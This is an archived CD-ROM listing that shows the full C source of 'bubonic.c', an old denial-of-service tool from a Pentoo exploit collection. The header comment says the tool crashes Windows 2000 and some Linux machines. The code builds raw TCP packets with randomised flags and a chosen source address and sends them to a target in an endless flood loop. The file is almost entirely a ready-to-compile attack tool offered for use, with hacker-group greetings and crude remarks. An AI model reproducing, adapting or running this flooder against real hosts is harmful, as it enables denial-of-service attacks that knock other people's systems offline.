Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / bubonic.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 6.6 KB | 267 lines

/* * Bubonic.c lame DoS against Windows 2000 machines * and certain versions of Linux (worked against an Ultra5 * running Redhat Zoot. Should compile under anything. * Randomly sends TCP packets with random settings, etc. * * Brings the load up causing the box to crash with * error code: * * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001) * MUST_SUCCEED_POOL_EMPTY * * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED. * WEE MULTICODE... www.antioffline.com/daemonic.c * * shouts... hrmm fsck it why not... * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian, * qwer7y, m3th, god-, tattooman, spikeman, and my wife. * Can't forget security staff all over the place. * * Logs for the packets sent at www.antioffline.com/logged * Windows2K screen shots at www.antioffline.com/loads.html */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, ip_v:4; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; u_long saddr, daddr; }; struct tcp_hdr { u_short th_sport; u_short th_dport; u_long th_seq; u_long th_syn; u_int th_x2:4, th_off:4; u_char th_flags; u_short th_win; u_short th_sum; u_short th_urp; }; struct tcpopt_hdr { u_char type; u_char len; u_short value; }; struct pseudo_hdr { u_long saddr, daddr; u_char mbz, ptcl; u_short tcpl; }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short bgport, bgsize, pps; u_long radd; u_long sradd; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname); fprintf(stderr, "Ports are set to send and receive on port 179\n"); fprintf(stderr, "dst:\tDestination Address\n"); fprintf(stderr, "src:\tSource Address\n"); fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n"); fprintf(stderr, "num:\tpackets\n\n"); exit(1); } inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s fucknut\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = rand(); packet.ip.ip_id = radd; packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = radd; packet.tcp.th_flags = random(); packet.tcp.th_win = 65535; packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 0; packet.tcp.th_urp = random(); packet.tcp.th_dport = random(); cksum.pseudo.daddr = sradd; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = random(); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = sradd; s_in.sin_port = packet.tcp.th_dport; for(i=0;;++i) { if( !(i&0x3FF) ) { packet.tcp.th_sport = rand(); cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd; packet.tcp.th_flags = random(); packet.tcp.th_ack = rand(); } else { packet.tcp.th_flags = rand(); packet.tcp.th_ack = rand(); } ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!bgport) s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } int main(int argc, char *argv[]) { int on = 1; printf("Bubonic -- sil@antioffline.com\n\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nFinding host\n"); fflush(stdout); radd = lookup(argv[1]); bgport = atoi(argv[3]); bgsize = atoi(argv[4]); sradd = lookup(argv[2]); printf("AntiOffline -- Putting the Hero in Heroin\n"); flooder(); return 0; } /* www.hack.co.za [28 August 2000]*/